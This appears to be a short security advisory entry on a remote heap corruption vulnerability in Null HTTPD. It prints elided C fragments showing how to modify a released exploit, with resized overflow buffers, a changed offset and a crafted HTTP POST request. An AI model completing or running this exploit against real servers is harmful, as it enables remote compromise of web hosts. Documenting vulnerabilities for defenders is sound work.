|
Null HTTPD Remote Heap Corruption Vulnerability
A modification of the netric exploit, available for the vulnerability in BID 5774, has been released. The following modification must be made to the referenced exploit: int exploit(....) { char sendbuf[1500]; /*char sendbuf[500];*/ char buffer[1377]; /*char buffer[377]*/ ..... for(i=0;i<1376;i=i+4) /*for(i=0;i<376;i=i+4) */ { ... } i = 1032; /* i = 224; */ ... buffer[1376] = 0x0; /* buffer[376] = 0x0;*/ snprintf(sendbuf, sizeof(sendbuf) -1, "POST / HTTP/1.0\n" "Content-Length: 8\n" /*"Content-Length: -800\n"*/ "\n%s\n",buffer); ... } |
|
|
Privacy Statement |
